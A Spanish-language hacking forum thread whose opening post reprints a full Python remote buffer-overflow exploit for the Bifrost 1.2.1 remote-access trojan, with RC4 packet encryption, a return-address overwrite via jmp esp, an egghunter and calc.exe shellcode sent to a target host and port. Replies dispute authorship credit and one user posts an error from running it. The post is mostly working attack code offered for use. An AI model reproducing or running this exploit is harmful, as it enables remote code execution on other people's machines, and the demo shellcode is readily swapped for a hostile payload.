comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Bifrost 1.2.1 - Remote Buffer OverFlow Vulnerability

  • 5 Respuestas
  • 2936 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 126
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Julio 09, 2013, 06:12:13 pm »
============================
Date add:   2013-07-01
Category:   remote exploits
Verified:   Not verified yet Not verified yet
Platform:   Windows
============================


Código: Python
  1. #!/usr/bin/python2.7
  2. #By : Mohamed Clay
  3. import socket
  4. from time import sleep
  5. from itertools import izip, cycle
  6. import base64
  7. import sys
  8.  
  9. def rc4crypt(data, key):
  10.     x = 0
  11.     box = range(256)
  12.     for i in range(256):
  13.         x = (x + box[i] + ord(key[i % len(key)])) % 256
  14.         box[i], box[x] = box[x], box[i]
  15.     x = 0
  16.     y = 0
  17.     out = []
  18.     for char in data:
  19.         x = (x + 1) % 256
  20.         y = (y + box[x]) % 256
  21.         box[x], box[y] = box[y], box[x]
  22.         out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
  23.      
  24.     return ''.join(out)
  25.  
  26. def bif_len(s):
  27.     while len(s)<8:
  28.          s=s+"00"
  29.     return s
  30.  
  31. def header(s):
  32.       a=(s[0]+s[1]).decode("hex")
  33.       a+=(s[2]+s[3]).decode("hex")
  34.       a+=(s[4]+s[5]).decode("hex")
  35.       a+=(s[5]+s[6]).decode("hex")
  36.       return a
  37.  
  38. def random():    
  39.     a=""
  40.     for i in range(0,8):
  41.         a+="A"*1000+"|"
  42.     return a
  43.  
  44. def usage():
  45.  
  46.    print "\n\n\t***************************"
  47.    print "\t*    By : Mohamed Clay    *"
  48.    print "\t*  Bifrost 1.2.1 Exploit  *"
  49.    print "\t***************************\n"
  50.    print "\t  Usage : ./bifrost1.2.1 host port"
  51.    print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"
  52.  
  53.  
  54. if len(sys.argv)!=3:
  55.     usage()
  56.     exit()
  57.  
  58. HOST=sys.argv[1]
  59. PORT=int(sys.argv[2])
  60.  
  61. key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
  62.  
  63. xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
  64. eip="\x53\x93\x3A\x7E" # jmp esp User32.dll
  65.  
  66. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
  67.  
  68. #calc.exe shellcode (badchars "\x00")
  69.  
  70. buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
  71. buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
  72. buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
  73. buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
  74. buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
  75. buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
  76. buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
  77. buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
  78. buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
  79. buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
  80. buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
  81. buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
  82. buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
  83. buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
  84. buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
  85. buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
  86. buf +="\xe1\x93\x28"
  87.  
  88.  
  89. raw=(1000-533-len(egghunter))*"\x90"
  90. raw2=(1000-8-len(buf))*"\x41"+"|"
  91. command=30
  92.  
  93. tmp=hex(command).split("0x")[1]
  94. data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
  95. out=rc4crypt(data,key)
  96. l=header(bif_len(str(hex(len(data))).split("0x")[1]))
  97. out=l+out
  98. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  99. s.connect((HOST, PORT))
  100. s.sendall(out)
  101. print "\n[*] By : Mohamed Clay"
  102. print "[*] Exploit completed\n"
« Última modificación: Julio 09, 2013, 09:47:37 pm por Kodeinfect »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #1 en: Julio 09, 2013, 06:55:36 pm »
Lo armo el staff el script? oque :/ no comprendo  por que lleva by Underc0de
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Kodeinfect

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Kodeinfect's Blog
« Respuesta #2 en: Julio 09, 2013, 09:47:02 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Lo armo el staff el script? oque :/ no comprendo  por que lleva by Underc0de
Es el mismo exploit que está por todas las webs.
Del código original se lee claramente #By : Mohamed Clay".
No se por que hacen esto, editaré el post y pondré el exploit original.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 126
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« Respuesta #3 en: Julio 10, 2013, 12:31:16 am »
Aver el post es de un exploit que tenia aca yo dando vueltas, Le puse "Underc0de" Pido disculpas si Ofendi a alguien -.-!"
« Última modificación: Julio 10, 2013, 12:43:27 am por Mayk0 »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #4 en: Julio 11, 2013, 04:50:31 pm »
No es que hayas ofendido a alquien -_-! o no simplemente que las cosas como son!!!

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Ricardini

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: system_security@live.com
« Respuesta #5 en: Agosto 22, 2013, 09:02:39 am »
este exploit ataca al troyano el cual hace el server osea al bifrost en si ? lo vulnera indicarme por favor

C:\Python33>bifrost.py
  File "C:\Python33\bifrost.py", line 3
    import socket
    ^
IndentationError: unexpected indent

me arroja ese error ????????????????????
« Última modificación: Agosto 22, 2013, 09:17:15 am por Ricardini »

 

¿Te gustó el post? COMPARTILO!



Joomla 0-Day - HTTP Headers Remote Code Execution - CVE-2015-8562

Iniciado por Franciscodc

Respuestas: 0
Vistas: 2798
Último mensaje Diciembre 26, 2015, 05:10:59 am
por Franciscodc
WordPress Wordfence Firewall 5.1.2 Cross Site Scripting Vulnerability

Iniciado por Mayk0

Respuestas: 0
Vistas: 1848
Último mensaje Noviembre 07, 2014, 01:55:54 pm
por Mayk0
Vuln Hunter 2014 - Website Vulnerability Scanner

Iniciado por ZanGetsu

Respuestas: 10
Vistas: 3826
Último mensaje Febrero 19, 2014, 12:27:07 pm
por GangsteR
CVE-2015-1701 : Windows 7 privilege escalation vulnerability

Iniciado por LionSec

Respuestas: 8
Vistas: 4169
Último mensaje Mayo 22, 2015, 08:02:27 pm
por rand0m
Zend hash del_key or index vulnerability! By MurdeR

Iniciado por ANTRAX

Respuestas: 0
Vistas: 1659
Último mensaje Abril 09, 2012, 09:13:44 am
por ANTRAX